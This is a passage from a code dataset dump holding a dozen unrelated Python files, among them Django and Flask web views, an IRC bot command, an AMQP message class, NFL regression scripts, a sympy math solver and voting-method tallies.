forms_are_valid:\n exam.takenby(request.user)\n return HttpResponseRedirect(\"/exam/submit_success/\")\n else:\n return HttpResponseRedirect(\"/exam/submit_fail/\")\n\n@login_required\ndef exam_answer(request,uid,eid):\n # for sake of example use .get\n context=RequestContext(request)\n objectuser=getuser(uid)\n exam = getexam(eid)\n useranswers=exam.getanswersbyuser(objectuser)\n trueanswers=exam.getanswersbyuser(getadmin())\n l=len(useranswers)\n l2=len(trueanswers)\n if l==l2:\n answers=[(useranswers[i],trueanswers[i],True if list(useranswers[i].answer.all())==list(trueanswers[i].answer.all()) else False) for i in range(l)]\n right=[answers[i][2] for i in range(l)].count(True)\n score=100.0*right/l\n else:\n answers=[(useranswers[i],None,None) for i in range(l)]\n return render_to_response('exam_answer.html',{'exam':exam,'answers':answers,'objectuser':objectuser,'error':'Something wrong with this system, so we can not evaluate your score at this moment!'},context)\n return render_to_response('exam_answer.html',{'exam':exam,'answers':answers,'objectuser':objectuser,'right':right,'score':score},context)\n\ndef submit_success(request):\n if request.method=='GET':\n context=RequestContext(request)\n return render_to_response('success.html',{'content':'提交成功!'},context)\n\ndef submit_fail(request):\n if request.method=='GET':\n context=RequestContext(request)\n return render_to_response('fail.html',{'content':'提交失败!'},context)\n","sub_path":"examination/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"380622650","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom django.contrib import messages\nfrom .models import User, Vacations\n# Create your views here.\ndef index(request):\n return render(request, \"index.html\")\n\ndef register(request):\n print(request.POST)\n resultFromValidator = User.objects.registerValidator(request.POST)\n print(\"RESULT FROM VALIDATOR BELOW!\")\n print(resultFromValidator)\n if len(resultFromValidator)>0:\n for key, value in resultFromValidator.items():\n messages.error(request, value)\n return redirect(\"/\")\n \n newUser= User.objects.create(Name= request.POST['name'], Username = request.POST['Uname'], Password= request.POST['pw'])\n print(\"HERE IS THE NEW USER\")\n print(newUser)\n request.session['loggedInId']= newUser.id\n\n return redirect(\"/travels\")\n\ndef login(request):\n print(request.POST)\n resultFromValidator = User.objects.loginValidator(request.POST)\n print(\"PRINT LOGIN VALIDATIONS HERE\")\n print(resultFromValidator)\n if len(resultFromValidator)>0:\n for key, value in resultFromValidator.items():\n messages.error(request, value)\n return redirect(\"/\")\n\n UserMatch = User.objects.filter(Username= request.POST['username'])\n\n\n \n \n request.session['loggedInId'] = UserMatch[0].id\n \n \n \n\n \n\n \n \n return redirect(\"/travels\")\n\ndef travels(request):\n loggedInUser = User.objects.get(id=request.session['loggedInId'])\n if 'loggedInId' not in request.session:\n messages.error(request, \"Log in to view Page.\")\n return redirect(\"/\")\n\n \n\n context = {\n 'loggedInId': loggedInUser,\n 'allVacations': Vacations.objects.all(),\n 'YourTrips': Vacations.objects.filter(PossibleTrips = loggedInUser),\n 'otherTrips': Vacations.objects.exclude(PossibleTrips = loggedInUser)\n\n }\n return render(request, \"travels.html\", context)\n\ndef logout(request):\n request.session.clear()\n return redirect(\"/\")\n\ndef addtrip(request):\n return render(request, \"addtrip.html\")\n\ndef createtrip(request): \n print(request.POST)\n resultFromValidator = Vacations.objects.vacationsValidator(request.POST)\n print(resultFromValidator)\n if len(resultFromValidator)> 0:\n for key, value in resultFromValidator.items():\n messages.error(request, value)\n return redirect(\"/travels/add\")\n newVacation= Vacations.objects.create(Name= request.POST['des'], TravelStart= request.POST['leave'], TravelEnd= request.POST ['return'], Plan= request.POST ['desc'], Traveler= User.objects.get(id=request.session['loggedInId'] ))\n return redirect(\"/travels\")\n\ndef tripdetails(request, tripID): \n context = {\n 'trip2show' : Vacations.objects.get(id= tripID)\n\n }\n return render(request, \"tripinfo.html\", context)\n\ndef JoinTrip(request, tripID):\n loggedInUser = User.objects.get(id=request.session['loggedInId'])\n this_trip = Vacations.objects.get(id= tripID)\n this_trip.PossibleTrips.add(loggedInUser)\n \n return redirect(\"/travels\")\n\ndef cancel(request, tripID): \n loggedInUser = User.objects.get(id=request.session['loggedInId'])\n this_trip = Vacations.objects.get(id= tripID)\n this_trip.PossibleTrips.remove(loggedInUser)\n\n return redirect(\"/travels\")","sub_path":"pythonExamApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"169022004","text":"from twisted.plugin import IPlugin\nfrom heufybot.moduleinterface import IBotModule\nfrom heufybot.modules.commandinterface import BotCommand\nfrom zope.interface import implements\nfrom random import choice\n\n\nclass ChooseCommand(BotCommand):\n implements(IPlugin, IBotModule)\n\n name = \"Choose\"\n\n def triggers(self):\n return [\"choose\", \"choice\"]\n\n def load(self):\n self.help = \"Commands: choose/choice , | Makes a choice out of the given options at random.\"\n self.commandHelp = {}\n\n def execute(self, server, source, command, params, data):\n if len(params) < 1:\n self.replyPRIVMSG(server, source, \"Choose what?\")\n return\n message = \" \".join(params)\n if \",\" in message:\n options = message.split(\",\")\n else:\n options = params\n self.replyPRIVMSG(server, source, \"Choice: {}\".format(choice(options).strip()))\n\n\nchooseCommand = ChooseCommand()\n","sub_path":"heufybot/modules/commands/choose.py","file_name":"choose.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"98929518","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/coils/foundation/api/amq/basic_message.py\n# Compiled at: 2012-10-12 07:02:39\n\"\"\"\nMessages for AMQP\n\n\"\"\"\nfrom serialization import GenericContent\n__all__ = [\n 'Message']\n\nclass Message(GenericContent):\n \"\"\"\n A Message for use with the Channnel.basic_* methods.\n\n \"\"\"\n PROPERTIES = [\n ('content_type', 'shortstr'),\n ('content_encoding', 'shortstr'),\n ('application_headers', 'table'),\n ('delivery_mode', 'octet'),\n ('priority', 'octet'),\n ('correlation_id', 'shortstr'),\n ('reply_to', 'shortstr'),\n ('expiration', 'shortstr'),\n ('message_id', 'shortstr'),\n ('timestamp', 'timestamp'),\n ('type', 'shortstr'),\n ('user_id', 'shortstr'),\n ('app_id', 'shortstr'),\n ('cluster_id', 'shortstr')]\n\n def __init__(self, body='', children=None, **properties):\n \"\"\"\n Expected arg types\n\n body: string\n children: (not supported)\n\n Keyword properties may include:\n\n content_type: shortstr\n MIME content type\n\n content_encoding: shortstr\n MIME content encoding\n\n application_headers: table\n Message header field table, a dict with string keys,\n and string | int | Decimal | datetime | dict values.\n\n delivery_mode: octet\n Non-persistent (1) or persistent (2)\n\n priority: octet\n The message priority, 0 to 9\n\n correlation_id: shortstr\n The application correlation identifier\n\n reply_to: shortstr\n The destination to reply to\n\n expiration: shortstr\n Message expiration specification\n\n message_id: shortstr\n The application message identifier\n\n timestamp: datetime.datetime\n The message timestamp\n\n type: shortstr\n The message type name\n\n user_id: shortstr\n The creating user id\n\n app_id: shortstr\n The creating application id\n\n cluster_id: shortstr\n Intra-cluster routing identifier\n\n Unicode bodies are encoded according to the 'content_encoding'\n argument. If that's None, it's set to 'UTF-8' automatically.\n\n example:\n\n msg = Message('hello world',\n content_type='text/plain',\n application_headers={'foo': 7})\n\n \"\"\"\n if isinstance(body, unicode):\n if properties.get('content_encoding', None) is None:\n properties['content_encoding'] = 'UTF-8'\n self.body = body.encode(properties['content_encoding'])\n else:\n self.body = body\n super(Message, self).__init__(**properties)\n return\n\n def __eq__(self, other):\n \"\"\"\n Check if the properties and bodies of this Message and another\n Message are the same.\n\n Received messages may contain a 'delivery_info' attribute,\n which isn't compared.\n\n \"\"\"\n return super(Message, self).__eq__(other) and self.body == other.body","sub_path":"pycfiles/OpenGroupware-0.1.48-py2.6/basic_message.py","file_name":"basic_message.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"600027610","text":"\"\"\"Create a request for the Gooogle Cloud Genomics V2alpha1 pipelines api.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nimport model\n\n\ndef create_pipeline_request(\n resources_config, job_config, actions, timeout=model.SEVEN_DAYS):\n \"\"\"Create a pipelines API request.\"\"\"\n envs = {}\n for vset in job_config.values():\n for v in vset:\n if hasattr(v, 'docker_path'):\n envs[v.name] = os.path.join(model.DATA_DISK_MOUNT, v.docker_path)\n else:\n envs[v.name] = v.value\n return {\n 'pipeline': {\n 'actions': [a.to_dict() for a in actions],\n 'resources': _create_resources(resources_config),\n 'environment': envs,\n 'timeout': timeout,\n },\n 'labels': {\n 'minsub': 'v1',\n },\n }\n\n\ndef _create_resources(rconfig):\n \"\"\"Create the resources payload of the pipelines request.\"\"\"\n vm = {\n 'machineType': rconfig.machine_type,\n 'preemptible': False,\n 'disks': [\n {\n 'name': model.DATA_DISK_NAME,\n 'sizeGb': rconfig.disk_size,\n }\n ],\n 'serviceAccount': {\n 'scopes': rconfig.scopes\n },\n }\n if rconfig.service_account:\n vm['serviceAccount']['email'] = rconfig.service_account\n return {\n 'projectId': rconfig.project,\n 'regions': [rconfig.region],\n 'virtualMachine': vm\n }\n","sub_path":"minsub/pipeline_api.py","file_name":"pipeline_api.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"131151249","text":"from __future__ import unicode_literals\nimport youtube_dl\n\n\nydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n}\nwith open('dalai_videolist') as f:\n for line in f:\n line = line.strip()\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([line])\n","sub_path":"dl_batch.py","file_name":"dl_batch.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"202655222","text":"__author__ = 'ragav777'\nimport numpy as np\nimport scipy.optimize as op\nimport csv\nimport math\nimport random\n\n\n# CostFunction gets a X that is m x (n+1) for theta0\n# y is m x 1 theta is (n+1) x 1\ndef costfunction(theta, X, y, lda ):\n m,n = X.shape\n theta = theta.reshape((n, 1))\n y = y.reshape((m, 1))\n error = np.dot(X, theta) - y\n term1 = (1/(2*m)) * sum(np.square(error))\n temp2 = np.vstack((np.zeros((1,1), dtype = np.int), theta[1:n]))\n term2 = (lda/(2*m))*sum(np.square(temp2))\n J = term1 + term2\n return J\n\ndef gradient(theta, X, y, lda ):\n m,n = X.shape\n theta = theta.reshape((n, 1))\n y = y.reshape((m, 1))\n error = np.dot(X, theta) - y\n term1 = (1/m) * np.dot((X.T), error)\n temp2 = np.vstack((np.zeros((1,1), dtype = np.int), theta[1:n]))\n term2 = (lda/m)*temp2\n grad = term1 + term2\n return grad.flatten()\n\ndef trainlinearregression( X, y, lda, maxiter):\n m,n = X.shape\n initial_theta = np.zeros((n, 1))\n result = op.minimize(fun = costfunction, x0 = initial_theta, args = (X, y, lda), method = 'TNC',\n jac = gradient, options ={ 'disp': False, 'maxiter': maxiter } )\n optimal_theta = result.x\n return optimal_theta\n\ndef cost_matrix(theta, X, y):\n m,n = X.shape\n theta = theta.reshape((n, 1))\n y = y.reshape((m, 1))\n error = np.dot(X, theta) - y\n rmsqe = math.sqrt(sum(np.square(error))/m)\n return error,rmsqe\n\ndef nfldataread(ppos) :\n with open('RB_5wkav.csv', 'r') as csvfile:\n nflreader = csv.reader(csvfile, delimiter=',')\n wfh = open ( (str(ppos)+ \".csv\"), 'w', newline=\"\")\n wfha = csv.writer(wfh)\n count = 0\n countr = 0\n playerindex= []\n\n ymap = { '2010':1/6, '2011':2/6, '2012':3/6, '2013':4/6, '2014':5/6, '2015':6/6 }\n tmap = { 'BAL':1/32, 'CIN':2/32, 'CLE':3/32, 'PIT':4/32, 'CHI':5/32, 'DET':6/32, 'GB':7/32, 'MIN':8/32, 'HOU':9/32, 'IND':10/32,\n 'JAC':11/32, 'TEN':12/32, 'ATL':13/32, 'CAR':14/32, 'NO':15/32, 'TB':16/32, 'BUF':17/32, 'MIA':18/32, 'NE':19/32,\n 'NYJ':20/32, 'DAL':21/32, 'NYG':22/32, 'PHI':23/32, 'WAS':24/32, 'DEN':25/32, 'KC':26/32, 'OAK':27/32, 'SD':28/32,\n 'ARI':29/32, 'SF':30/32, 'SEA':31/32, 'STL':32/32 }\n for row in nflreader:\n\n for i in [0,1,2,5,6,7,8,9,10,11,15,18,19,23,24,26,30,32,33,34,35,36,27,38] :\n if row[i] == '' :\n row[i] = 0\n #Zeroing out empty params\n\n if count != 0 :\n year = str(row[0]) #i\n game_eid = row[1] #i\n game_week = float(row[2])/17 #ni\n game_time = str(row[5]) #ni\n home_team = row[6] #i\n away_team = row[7] #i\n score_home = float(row[8])/50 #ni\n score_away= float(row[9])/50 #ni\n fumbles_tot = int(row[10])\n rushing_yards = float(row[11])/100 #o\n #receiving_lngtd = row[18]\n #rushing_twopta = row[25] #i\n rushing_tds = float(row[15])/3 #o\n #receiving_rec = row[34]\n #receiving_twopta = row[36]\n receiving_yds = float(row[18])/100\n rushing_att = float(row[19])/10 #i\n #reciving_twoptm = row[40] #o\n #rushing_lngtd = row[44]\n #receiving_lng = row[48]\n pos = row[23]\n receiving_tds = float(row[24])/3 #o\n name =row[26]\n #rushing_twoptm = row[61] #o\n #rushing_lng = row[64]\n team = row[30] #i\n points = float(row[32])\n n5wavyds = float(row[33])/100\n n5wavatt = float(row[34])/10\n n5wavrutd = float(row[35])/3\n n5wavnrec = float(row[36])/10\n n5wavrecyds = float(row[37])/100\n n5wavrectd = float(row[38])/3\n\n\n\n if ((pos == ppos)) :\n if name not in playerindex :\n playerindex.append(name)\n player_number = float(playerindex.index(name)+1)/100\n\n map_year = ymap[year] #m\n if (team == home_team) :\n playing_home = 1 #m\n else :\n playing_home = 0 #m\n\n if (team == home_team) :\n played_against = tmap[away_team] #m\n else :\n played_against = tmap[home_team] #m\n\n #Added Game week #m\n #Added Player team's score #m\n if playing_home :\n team_score = float(score_home) #nm\n else :\n team_score = float(score_away) #nm\n\n #Added Opponent team's score #m\n if playing_home :\n opposition_score = float(score_away) #nm\n else:\n opposition_score = float(score_home) #nm\n\n #(ghr,gmin) = game_time.split(\":\")\n #time_played = int(ghr) + (int(gmin)/60) #nm\n\n temp = str(game_eid)\n month_played = float(int(temp[4:6])/12) #m\n\n total_points = (((rushing_tds+ receiving_tds)*18) + (( rushing_yards +receiving_yds)*10) \\\n -(fumbles_tot*2))/10\n\n #temp = -4.3*(playerindex.index(name)+1) + (5.2*map_year) + (1.0033*playing_home)-(2.03*played_against) +(1*game_week)\\\n #+(2.5*game_week) + (1*time_played) + (2.6*team_score) + (3.2*opposition_score) + (1.6*month_played)\n\n string = [ str(player_number), str(map_year), str(playing_home), str(played_against),\n str(game_week), str(team_score), str(opposition_score),\n str(month_played), str(tmap[team]),\n str(n5wavyds), str(n5wavatt), str(n5wavrutd), str(n5wavnrec), str(n5wavrecyds),\n str(n5wavrectd),\n str(n5wavyds**2), str(n5wavatt**2), str(n5wavrutd**2), str(n5wavnrec**2), str(n5wavrecyds**2),\n str(n5wavrectd**2),\n str(total_points), str(name), str(points) ]\n wfha.writerow(string)\n countr = countr +1\n count = count + 1\n wfh.close()\n return countr #Total records\n #print (countr) #Matched records\n\ndef createrandom(master,mtotal,mtrain,cv) :\n rndtemp = list(range(0,mtotal))\n random.shuffle(rndtemp)\n rndlinelist = sorted(rndtemp[1:mtrain+1])\n if cv:\n strng = \"cv\"\n wfh2 = open ( (master + \"minus\" + strng + \".csv\"), 'w', newline=\"\")\n wfha2 = csv.writer(wfh2)\n else:\n strng = \"train\"\n wfh = open ( (strng + str(mtrain) + \".csv\"), 'w', newline=\"\")\n wfha = csv.writer(wfh)\n count = 0\n countr = 0\n with open((str(master) + \".csv\"), 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for row in reader:\n if count in rndlinelist:\n countr = countr +1 #matched\n wfha.writerow(row)\n elif ((count not in rndlinelist) and cv) :\n wfha2.writerow(row)\n\n count = count +1\n wfh.close()\n if cv:\n wfh2.close()\n return countr\n\n\ndef trainregression(mfile,lda,maxiter):\n Xtemp = np.loadtxt( (mfile +'.csv'), dtype = float, delimiter = ',', usecols = range(21) )\n mtr,ntr = np.shape(Xtemp)\n Xtrain = np.hstack ((np.ones ((mtr, 1)), Xtemp))\n Ytrain = np.loadtxt( (mfile + '.csv'), dtype = float, delimiter = ',', usecols = (21,) )\n theta = trainlinearregression( Xtrain, Ytrain, lda, maxiter)\n return theta\n\n\ndef cost_file(mfile, theta):\n Xtemp = np.loadtxt( (mfile +'.csv'), dtype = float, delimiter = ',', usecols = range(21) )\n m,n = np.shape(Xtemp)\n X = np.hstack ((np.ones ((m, 1)), Xtemp))\n y = np.loadtxt( (mfile + '.csv'), dtype = float, delimiter = ',', usecols = (21,) )\n theta = theta.reshape((n+1, 1))\n y = y.reshape((m, 1))\n error = np.dot(X, theta) - y\n # rmsqe = sum(abs(error))\n rmsqe = math.sqrt(sum(np.square(error))/m)\n return rmsqe\n\ndef main():\n\n lda = 0.001\n maxiter = 200\n master = 'RB'\n numcv = 1500\n iscv = 1\n istrain = 0\n\n mtotal = nfldataread(master) #returns num matched records\n print (\"mtotal \"+ str(mtotal))\n cvcount = createrandom(master,mtotal,numcv,iscv) #creates $master + \"minuscv\".csv and cv + $m.csv\n print (\"cvcount \"+ str(cvcount))\n mlist = [100,3467]\n for m in range(100,(mtotal-numcv),100):\n #for m in mlist :\n createrandom((master + \"minus\" + \"cv\"), (mtotal-numcv), m, istrain ) #creates $master + \"minuscsv\" + $m.csv\n theta = trainregression((\"train\" + str(m)),lda,maxiter)\n errortrain = cost_file((\"train\" + str(m)), theta)\n errorcv = cost_file((\"cv\"+str(cvcount)), theta)\n print ( \"Trng m : \" + str(m) + \" Trng err : \" + str(errortrain) + \" cv error : \" + str(errorcv))\n print (theta)\nif __name__ == '__main__' :\n main()\nelse :\n print(\"Didnt Work\")\n","sub_path":"LinearReg3.py","file_name":"LinearReg3.py","file_ext":"py","file_size_in_byte":9318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"482268359","text":"from sympy import *\nfrom sympy.abc import *\nfrom . import substandard\n\n\n\ndef convert(inp):\n \"\"\"\n Since human readable expressions ofen combine numeric with alphabet\n when they are meant to be multiplied, Thus,\n all equations must be re-written to place * between then.\n For example: 5x+8sin(x) means 5*x+8*sin(x)\n \"\"\"\n # Is there \"=\" in the expresion?\"\n if len(inp) == 0:\n return inp\n\n # Rewrite the expression from scratch\n tmp = [inp[0]]\n for i in range(1, len(inp)):\n # '*' should only be written if a digit and alphabet are next to each other\n if (inp[i].isalpha() and inp[i - 1].isdigit()) or (\n inp[i].isdigit() and inp[i - 1].isalpha()):\n tmp.append('*')\n tmp.append(inp[i])\n ans = ''.join(tmp)\n return ans\n\ndef equate(inexpr):\n # Negating the RHS\n left, right = inexpr.split('=', 1)\n ans = '{}-({})'.format(left, right)\n return ans\n\n\ndef rewrite(in_expr):\n \"\"\"\n This function generate the python equivalent of a\n human readable expression\n \"\"\"\n # norm_input substitutes some allowed sub-standard operators\n norm_in = substandard.norm_input(str(in_expr).lower())\n norm_in = convert(norm_in)\n if '=' in norm_in:\n norm_in = equate(norm_in)\n return norm_in\n\ndef compute(in_expr):\n try:\n # checking if it's one of the supported casual texts\n comval = substandard.my_texts[str(in_expr).lower()]\n return comval\n except:\n pass\n # Standardize the expression\n norm_in = rewrite(in_expr)\n\n try:\n \"\"\"\n checking if the starts with an operation key word\n such as differentiate(2x+9)\n in order not to capture some standard short math functions as\n an operation key word, such as sin(), cos(), a rule of thumb that if the first word before \"(\"\n is not an operation keyword if its not longer than 3\n \n the solve operation is tried on the incoming expression\"\"\"\n parts = norm_in.split(\"(\")\n if parts[0].isalpha() and len(parts[0])>3:\n raise Exception\n comval = solve(norm_in)\n if len(comval) ==0:\n raise Exception\n\n except:\n try:\n \"\"\"\n try to solve symbolically first, and it will\n produce whole number for multiplication\n \"\"\"\n comval = sympify(norm_in)\n\n try:\n float(comval) #it will not float if its not purely numeric\n full_expr = \"(\" + norm_in + \")\" + \".evalf(6)\"\n comval2 = sympify(full_expr)\n # trailing zeros are not needed for something like 6*5=30\n if comval != comval2:\n comval = comval2\n\n except:\n pass\n\n except:\n comval = substandard.my_texts[\"errortxt\"]\n # converting the solution back to human readable form \n comval = str(comval)\n comval = comval.replace(\"**\",\"^\")\n comval = comval.replace(\"oo\",\"inf\")\n return comval\n\n","sub_path":"app/mathsend_engine/human_math/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"2319193","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@author:knktc\n@contact:me@knktc.com\n@create:2018-07-21 08:58\n\"\"\"\n\n\"\"\"\nGiven a sorted (in ascending order) integer array nums of n elements and a target value, write a function to search target in nums. If target exists, then return its index, otherwise return -1.\n\n\nExample 1:\n\nInput: nums = [-1,0,3,5,9,12], target = 9\nOutput: 4\nExplanation: 9 exists in nums and its index is 4\n\nExample 2:\n\nInput: nums = [-1,0,3,5,9,12], target = 2\nOutput: -1\nExplanation: 2 does not exist in nums so return -1\n \n\nNote:\n\nYou may assume that all elements in nums are unique.\nn will be in the range [1, 10000].\nThe value of each element in nums will be in the range [-9999, 9999].\n\"\"\"\n\n\"\"\"\n使用二分法实现,要求list是有序的。\n用第一个index和最后一个index相加的结果除以2(//表示除后取整数部分)作为中间的index,然后再用中间的这个index对应的数据判断target在前半部分还是后半部分。\n\"\"\"\n\n__author__ = 'knktc'\n__version__ = '0.1'\n\n\nclass Solution:\n def search(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n low_index = 0\n hi_index = len(nums) - 1\n\n while hi_index >= low_index:\n mid_index = (low_index + hi_index) // 2\n if target > nums[mid_index]:\n low_index = mid_index + 1\n elif target < nums[mid_index]:\n hi_index = mid_index - 1\n else:\n return mid_index\n\n return -1\n\n\n\ndef main():\n \"\"\"\n main process\n\n \"\"\"\n s = Solution()\n\n test_cases = [\n ([-1, 0, 3, 5, 9, 12], 9),\n ([-1, 0, 3, 5, 9, 12], 5),\n ([-1, 0, 3, 5, 9, 12], 2),\n ([2, ], 2),\n ([-1, ], 2),\n\n ]\n for nums, target in test_cases:\n print(\"==========\")\n print(\"input: nums:{} target:{}\".format(nums, target))\n print(\"output: {}\".format(s.search(nums=nums, target=target)))\n\n\nif __name__ == '__main__':\n main()","sub_path":"python/704.Binary_Search.py","file_name":"704.Binary_Search.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"384286300","text":"import operator\r\nimport pandas as pd\r\nheader_list = ['count', 'candidat1', 'candidat2', 'candidat3']\r\ndf = pd.read_csv('data.csv', names=header_list)\r\n\r\nsum_ = df['count'].sum()\r\nA, B, C, AB, BA, AC, CA, CB, BC = 0, 0, 0, 0, 0, 0, 0, 0, 0\r\nAB = df[(df.candidat1 == 'A')|((df.candidat2 == 'A' )&(df.candidat3 == 'B'))]['count'].sum()\r\nBA = sum_ - AB\r\nAC = df[(df.candidat1 == 'A')|((df.candidat2 == 'A' )&(df.candidat3 == 'C'))]['count'].sum()\r\nCA = sum_ - AC\r\nBC = df[(df.candidat1 == 'B')|((df.candidat2 == 'B' )&(df.candidat3 == 'C'))]['count'].sum()\r\nCB = sum_ - BC\r\n\r\ndic = {'А більше Б':[AB],'А більше С':[AC],'Б більше А':[BA],'Б білше С':[BC],'С більше А':[CA],'С більше Б':[CB],}\r\nresult = pd.DataFrame(dic)\r\nprint('Метод Кондорсе:')\r\nprint(result)\r\n\r\nif AB>BA and AC>CA:\r\n print('Виграє кандидат А')\r\nelif BA>AB and BC>CB:\r\n print('Виграє кандидат Б')\r\nelif CA>AC and CB>BC:\r\n print('Виграє кандидат С')\r\nelse:\r\n print('Переможця немає')\r\nprint()\r\n# Метод Борда\r\ndef bord(row, candidat):\r\n sum_ = 0\r\n if row.candidat1 == candidat:\r\n sum_ += int(row['count'])*3\r\n elif row.candidat2 == candidat:\r\n sum_ += int(row['count'])*2\r\n elif row.candidat3 == candidat:\r\n sum_ += int(row['count'])*1\r\n return sum_\r\n\r\n\r\nA = df.apply(bord,candidat = 'A', axis = 1).sum()\r\nB = df.apply(bord,candidat = 'B', axis = 1).sum()\r\nC = df.apply(bord,candidat = 'C', axis = 1).sum()\r\ndic2 = {'Кандидат А':[A],'Кандидат Б':[B],'Кандидат С':[C],}\r\nresult2 = pd.DataFrame(dic2)\r\nprint('Метод Борда:')\r\nprint(result2)\r\nprint('Виграє:',max(dic2.items(), key=operator.itemgetter(1))[0])","sub_path":"лаб3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"158597406","text":"from random import sample\nfrom flask import Flask, render_template, request\nimport data\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n\n # choose six random tours\n sample_tours = sample(data.tours.items(), 6)\n\n output = render_template(\"index.html\",\n title=data.title,\n departures=data.departures,\n subtitle=data.subtitle,\n description=data.description,\n sample_tours=sample_tours)\n return output\n\n\n@app.route('/from/')\ndef directions(direction):\n\n tours_from_direction = {}\n for tour_id, tour in data.tours.items():\n if tour['departure'] == direction:\n tours_from_direction[tour_id] = tour\n\n output = render_template(\"direction.html\",\n title=data.title,\n departures=data.departures,\n direction=direction,\n tours_from_direction=tours_from_direction)\n return output\n\n\n@app.route('/tours/')\ndef tours(tour_id):\n output = render_template(\"tour.html\",\n title=data.title,\n departures=data.departures,\n tour=data.tours[tour_id])\n return output\n\n\n@app.errorhandler(404)\ndef not_found(e):\n return \"Ничего не нашлось! Вот неудача, отправляйтесь на главную!\"\n\n\n@app.errorhandler(500)\ndef server_error(e):\n return \"Что-то не так, но мы все починим\"\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"131278020","text":"import json\nimport shlex\nimport subprocess\nfrom config import SALT_KEY_CMD\n\n\nSTATES_MAPPING = dict(unaccepted='minions_pre', accepted='minions')\n\n\ndef get_keys_status(env):\n cmd = shlex.split(SALT_KEY_CMD.format(**env))\n cmd.append(\"-L\")\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, env=env)\n output, unused_err = process.communicate()\n return json.loads(output)\n\n\ndef assert_minion_key_state(env, expected_state):\n assert expected_state in STATES_MAPPING\n status = get_keys_status(env)\n print('{0} in {1}'.format(env['HOSTNAME'], STATES_MAPPING[expected_state]))\n assert env['HOSTNAME'] in status[STATES_MAPPING[expected_state]]\n\n\ndef assert_proxyminion_key_state(env, expected_state):\n assert expected_state in STATES_MAPPING\n status = get_keys_status(env)\n print('{0} in {1}'.format(env['HOSTNAME'], STATES_MAPPING[expected_state]))\n assert env['PROXY_ID'] in status[STATES_MAPPING[expected_state]]\n","sub_path":"assertions.py","file_name":"assertions.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"435078250","text":"\"\"\"rotate-and-crop analysis.\"\"\"\n\nimport os\nimport logging\nimport argparse\n\nimport numpy as np\nimport scipy.misc\n\nfrom jicbioimage.core.image import Image\nfrom jicbioimage.core.transform import transformation\nfrom jicbioimage.core.io import AutoName, AutoWrite\n\nfrom jicbioimage.transform import (\n remove_small_objects,\n)\n\nfrom jicbioimage.segment import Region\n\nfrom zbar import zbar\n\n__version__ = \"0.0.1\"\n\nAutoName.prefix_format = \"{:03d}_\"\n\n\ndef generate_output_filename(fpath):\n \"\"\"Try to generate filename from QR code in fpath image.\"\"\"\n name = os.path.splitext(os.path.basename(fpath))[0]\n stdout, stderr, returncode = zbar(fpath)\n if returncode == 0:\n name = stdout.split(\":\")[1].strip()\n name = name.replace(\" \", \"-\")\n fname = name + \"-rotated-and-cropped.png\"\n return fname\n\n\n@transformation\ndef identity(image):\n \"\"\"Return the image as is.\"\"\"\n return image\n\n\n@transformation\ndef rescale(image, scale):\n \"\"\"Return rescaled image.\"\"\"\n def megapixels(image):\n return image.shape[0] * image.shape[1] / 1e6\n logging.info(\"megapixels pre scaling: {}\".format(megapixels(image)))\n image = scipy.misc.imresize(image, scale)\n logging.info(\"megapixels post scaling: {}\".format(megapixels(image)))\n return image\n\n\n@transformation\ndef rotate(image):\n \"\"\"Return correctly aligned image.\"\"\"\n return np.rot90(image)\n\n\n@transformation\ndef red_channel_diff_to_mask(image, min_diff):\n return image[:, :, 0] < (image[:, :, 2] - min_diff)\n\n\n@transformation\ndef green_channel_diff_to_mask(image, min_diff):\n return image[:, :, 1] < (image[:, :, 2] - min_diff)\n\n\n@transformation\ndef min_blue_mask(image, min_blue):\n return image[:, :, 2] > min_blue\n\n\n@transformation\ndef blue_to_mask(image, min_blue, min_difference):\n blue_mask = min_blue_mask(image, min_blue)\n red_diff_mask = red_channel_diff_to_mask(image, min_difference)\n green_diff_mask = green_channel_diff_to_mask(image, 